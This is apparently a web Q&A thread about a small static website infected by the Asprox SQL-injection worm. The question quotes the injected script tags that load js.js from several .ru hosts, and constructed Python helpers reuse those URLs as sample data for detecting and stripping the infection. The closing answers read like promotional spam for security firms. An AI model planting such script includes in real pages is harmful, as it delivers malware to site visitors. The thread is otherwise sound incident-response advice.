My dad called me today and said people going to his website were getting 168 viruses trying to download to their computers. He isn't technical at all, and built the whole thing with a WYSIWYG editor.

I popped his site open and viewed the source, and there was a line of JavaScript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): http://www.98hs.ru/js.js <-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.

So I commented it out for now. It turns out his ftp password was a plain dictionary word six letters long, so we think that's how it got hacked. We've changed his password to an 8+ digit non-word string (he wouldn't go for a passphrase since he is a hunt-n-peck typer).

I did a whois on 98hs.ru and found it is hosted from a server in Chile. There is actually an e-mail address associated with it too, but I seriously doubt this person is the culprit. Probably just some other site that got hacked...

I have no idea what to do at this point though as I've never dealt with this sort of thing before. Anyone have any suggestions?

He was using plain-jane unsecured FTP through webhost4life.com. I don't even see a way to do SFTP on their site. I'm thinking his username and password got intercepted?

So, to make this more relevant to the community, what are the steps you should take/best practices you should follow to protect your website from getting hacked?

For the record, here is the line of code that "magically" got added to his file (and isn't in his file on his computer -- I've left it commented out just to make absolute sure it won't do anything on this page, although I'm sure Jeff would guard against this):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script 
src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script 
src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
+3  A: 

With a six-character word as a password, he may have been brute forced. That is more likely than his FTP being intercepted, but it could be that too.

Start with a stronger password. (8 characters is still fairly weak)

See if this link to an internet security blog is helpful.

Justin Standard
+13  A: 

Try and gather as much information as you can. See if the host can give you a log showing all the FTP connections that were made to your account. You can use those to see if it was even an FTP connection that was used to make the change and possibly get an IP address.

If you're using prepackaged software like WordPress, Drupal, or anything else that you didn't code, there may be vulnerabilities in upload code that allow for this sort of modification. If it is custom built, double check any places where you allow users to upload files or modify existing files.

The second thing would be to take a dump of the site as-is and check everything for other modifications. It may just be one single modification they made, but if they got in via FTP who knows what else is up there.

Revert your site back to a known good status and, if need be, upgrade to the latest version.

There is a level of return you have to take into account too. Is the damage worth trying to track the person down or is this something where you just live and learn and use stronger passwords?

dragonmantank
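Checking a dump of the live site against the known-good local copy, as this answer suggests, and listing the foreign script sources that were injected into pages, as in the question. This is an added example, not code from the thread; it assumes the local copy is clean, and the two sample trees it builds (including the dropped .htaccess) are constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# src attribute of any <script> tag, quoted or unquoted (the injected tags were unquoted).
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)


def file_digests(root):
    """Map relative path -> SHA-256 for every file under root (dotfiles included)."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def external_scripts(html):
    """Script sources that load from another host (http://, https:// or //)."""
    return {s for s in SCRIPT_SRC.findall(html) if re.match(r"(https?:)?//", s, re.I)}


def compare_trees(local, server):
    """Files only on the server, files whose bytes differ, and per differing HTML file
    the foreign script hosts that the local copy never referenced."""
    good, live = file_digests(local), file_digests(server)
    report = {"unexpected": sorted(set(live) - set(good)), "modified": [], "foreign_scripts": {}}
    for rel in sorted(set(good) & set(live)):
        if good[rel] == live[rel]:
            continue
        report["modified"].append(rel)
        if rel.lower().endswith((".htm", ".html")):
            extra = (external_scripts((server / rel).read_text(errors="replace"))
                     - external_scripts((local / rel).read_text(errors="replace")))
            if extra:
                report["foreign_scripts"][rel] = sorted(extra)
    return report


def build_sample(base=None):
    """Constructed fixture: a clean local copy, plus a server dump with one injected
    page and a dropped .htaccess, mirroring the incident in the question."""
    base = Path(base or tempfile.mkdtemp())
    local, server = base / "local", base / "server"
    for root in (local, server):
        (root / "images").mkdir(parents=True, exist_ok=True)
        (root / "index.html").write_text("<html><body>Hi</body></html>")
        (root / "images" / "logo.gif").write_bytes(b"GIF89a")
    (server / "index.html").write_text(
        "<html><body>Hi</body><script src=http://www.98hs.ru/js.js></script></html>")
    (server / "images" / ".htaccess").write_text("RewriteEngine On\n")
    return local, server
```

Running `compare_trees(*build_sample())` reports the .htaccess as an unexpected file, index.html as modified, and the 98hs.ru include as the only foreign script; on a real site, point the two arguments at the local publishing folder and the FTP download.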
+2  A: 

Is the site just plain static HTML? i.e. he hasn't managed to code himself an upload page that permits anyone driving by to upload compromised scripts/pages?

Why not ask webhost4life if they have any FTP logs available, and report the issue to them? You never know, they may be quite receptive and find out for you exactly what happened.

I work for a shared hoster and we always welcome reports such as these; we can usually pinpoint the exact vector of attack and advise as to where the customer went wrong.

Kev
+5  A: 

You mention your Dad was using a website publishing tool.

If the publishing tool publishes from his computer to the server, it may be the case that his local files are clean, and that he just needs to republish to the server.

He should see if there's a different login method to his server than plain FTP, though... that's not very secure because it sends his password as clear-text over the internet.

Mark Harrison
+14  A: 

I know this is a little late in the game, but the URL mentioned for the JavaScript is mentioned in a list of sites known to have been part of the ASPRox bot resurgence that started up in June (at least that's when we were getting flagged with it). Some details about it are mentioned below:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

The nasty thing about this is that effectively every varchar type field in the database is "infected" to spit out a reference to this URL, in which the browser gets a tiny iframe that turns it into a bot. A basic SQL fix for this can be found here:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

The scary thing though is that the virus looks to the system tables for values to infect, and a lot of shared hosting plans also share the database space for their clients. So most likely it wasn't even your dad's site that was infected, but somebody else's site within his hosting cluster that wrote some poor code and opened the door to a SQL injection attack.

If he hasn't done so yet, I'd send an URGENT e-mail to their host and give them a link to that SQL code to fix the entire system. You can fix your own affected database tables, but most likely the bots that are doing the infection are going to pass right through that hole again and infect the whole lot.

Hopefully this gives you some more info to work with.

EDIT: One more quick thought: if he's using one of the host's online design tools for building his website, all of that content is probably sitting in a column and was infected that way.

Dillie-O
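The recovery approach this answer points at, walking the system tables for every char/text column and stripping the appended script tag from each value, as an added example (not the thread's or the linked article's code). It uses an in-memory SQLite database with constructed rows as a stand-in, so the metadata queries (sqlite_master, PRAGMA table_info) are assumptions that would need swapping for the SQL Server system views on a real host.

```python
import re
import sqlite3

# The tag the worm appends to text values; removing it restores the original value.
INJECTED = re.compile(r"<script\s+src=[^>]*>\s*</script>", re.I)


def text_columns(conn):
    """(table, column) for every char/text column, read from the same system tables the worm used."""
    pairs = []
    for (table,) in conn.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall():
        for _cid, name, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")').fetchall():
            if any(k in (ctype or "").upper() for k in ("CHAR", "TEXT")):
                pairs.append((table, name))
    return pairs


def find_infected(conn):
    """Rows per (table, column) that still carry an injected script tag."""
    hits = {}
    for t, c in text_columns(conn):
        n = conn.execute(f'SELECT COUNT(*) FROM "{t}" WHERE "{c}" LIKE ?', ("%<script src=%",)).fetchone()[0]
        if n:
            hits[(t, c)] = n
    return hits


def clean(conn):
    """Strip the injected tag from every affected value; returns the number of rows changed."""
    changed = 0
    for t, c in text_columns(conn):
        rows = conn.execute(f'SELECT rowid, "{c}" FROM "{t}" WHERE "{c}" LIKE ?', ("%<script src=%",)).fetchall()
        for rid, val in rows:
            conn.execute(f'UPDATE "{t}" SET "{c}" = ? WHERE rowid = ?', (INJECTED.sub("", val), rid))
            changed += 1
    conn.commit()
    return changed


def build_sample():
    """Constructed fixture: two tables, three infected varchar/text values, numeric columns untouched."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages(id INTEGER, title VARCHAR(200), body TEXT);
        CREATE TABLE users(id INTEGER, name VARCHAR(50), age INTEGER);
        INSERT INTO pages VALUES (1, 'Home<script src=http://www.98hs.ru/js.js></script>', 'Welcome');
        INSERT INTO pages VALUES (2, 'About', 'Clean<script src=http://www.porv.ru/js.js></script>');
        INSERT INTO users VALUES (1, 'bob<script src=http://www.98hs.ru/js.js></script>', 40);
    """)
    return conn
```

Run `find_infected` first to see the scope, then `clean`, then `find_infected` again to confirm nothing remains; the hole that let the rows be written still has to be closed or the same values come back.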
A: 

We had been hacked by the same guys, apparently! Or bots, in our case. They used SQL injection in the URL on some old classic ASP sites that nobody maintains anymore. We found the attacking IPs and blocked them in IIS. Now we must refactor all the old ASP. So, my advice is to take a look at the IIS logs first, to find out if the problem is in your site's code or server configuration.

Hrvoje
A: 

Unplug the webserver without shutting it down to avoid shutdown scripts. Analyze the hard disk through another computer as a data drive and see if you can determine the culprit through log files and things of that nature. Verify that the code is safe and then restore it from a backup.

Joe Philllips
A: 

This happened to a client of mine recently that was hosted on ipower. I'm not sure if your hosting environment was Apache based, but if it was, be sure to double check for .htaccess files that you did not create, particularly above the webroot and inside of image directories, as they tend to inject some nastiness there as well (they were redirecting people depending on where they came from in the referrer). Also check any that you did create for code that you did not write.

The Brawny Man
A: 

I have written a server-side code removal tool in ASP.Net Here. Hope this will help you save time cleaning the hosted files :) This is much faster than cleaning the files via FTP or your control panel.

Faiz
A: 

Hi, my father-in-law got his site hacked as well. He got in touch with a security company called Serios Networks. They fixed it up and there are no more problems with his site! Their site is seriosnetworks.com. The guy that helped us out is named Adam. His number is 269-202-4003; give them a try, they worked for us.

A: 

We had these types of issues with our clients for years. It is an unavoidable issue; every website is under threat.

We use http://www.websafe.ie/ for all our clients before handing over site ownership. But a little late for preventive measures now, mate.

Clear up the mess and start fresh with a little more security this time. Good luck.

James Snipes